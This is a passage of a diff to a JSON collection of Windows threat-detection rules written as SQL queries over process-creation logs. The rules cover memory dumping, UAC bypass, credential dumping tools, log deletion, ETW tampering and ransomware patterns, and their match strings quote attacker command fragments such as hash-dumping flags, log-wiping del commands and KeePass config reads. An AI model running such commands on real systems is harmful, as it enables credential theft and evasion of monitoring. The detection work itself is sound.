ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + 
"attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", 
+ "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR 
CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": 
"Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "status": "test", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects Wscript or Cscript executing from a drive other than C. 
This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "status": "test", + "description": "Suspicious behaviours related to an 
actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_download_dll.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "A General detection for sdclt being spawned as an elevated process. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Psr.exe Capture Screenshots", + "id": 
"2158f96f-43c2-43cb-952a-ab4580f32382", + "status": "test", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential 
Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", + "status": "experimental", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": 
"5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control 
Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' 
ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 